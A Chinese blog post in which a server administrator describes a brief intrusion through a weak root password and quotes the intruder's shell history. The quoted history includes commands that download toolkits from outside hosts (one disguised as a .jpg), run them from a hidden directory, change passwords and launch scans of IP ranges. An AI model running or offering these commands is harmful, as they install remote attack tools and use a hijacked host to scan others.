给root那么弱一个密码,我一直担心迟早会出事,今天果然应验了我的乌鸦嘴。

自从网站上线,我就没早睡过,一直ssh着,隔一段时间检查一下登录记录、who一下什么的,好在一直还都没什么异常。今天也不例外,在网站主 机上一直挂着,结果晚上嘴馋吃点儿好吃的,几分钟后再回来发现已经断开了,重新ssh过去就发现密码已经被改了,比较狠,我们常用的两个账号的密码都改了 (几乎也是系统里唯二给人用的账号),好在我还有其他的方法,赫赫,把这个入侵者赶了出去,然后改了密码。查了一下几个账号的.bash_history,有几句比较好玩:

cd /var/tmp ; wget fear.uv.ro/linux.tgz ; tar zxvf linux.tgz ; rm -rf linux.tgz ; cd “..?? " ; ./bash w passwd passwd passwd cd /var/tmp ; wget fear.uv.ro/linux.tgz ; tar zxvf linux.tgz ; rm -rf linux.tgz ; cd “..?? " ; ./bash cat /proc/cpuinfo cd wget sssh.go.ro/scaner/nk.jpg tar xzvf nk.jpg rm -rf nk.jpg cd nk ./start 66.33 ./start 200.192 ./start 200.193

熟悉的人们应该马上猜到了这个大哥都干了什么了。让我比较担心的是系统好像被重启了一次,所以怀疑装了其他后门,有时间再说了,好在外面有防火墙主机,只开了几个端口。

这位入侵者当时的ip是82.77.136.226,再看看他下载工具的两个网站的域名,估计应该真的是罗马尼亚的客人吧。

前后一共也就一刻钟的时间,也许没什么时间做些其他破坏?感觉起来还是比较菜的类型,可能就为了扩大入侵战果,拿我们可怜的服务器做根据地扫描其他主机罢了。但愿~

好久不干这些,果然不行,赫赫,脑子里空白了近一分钟才行动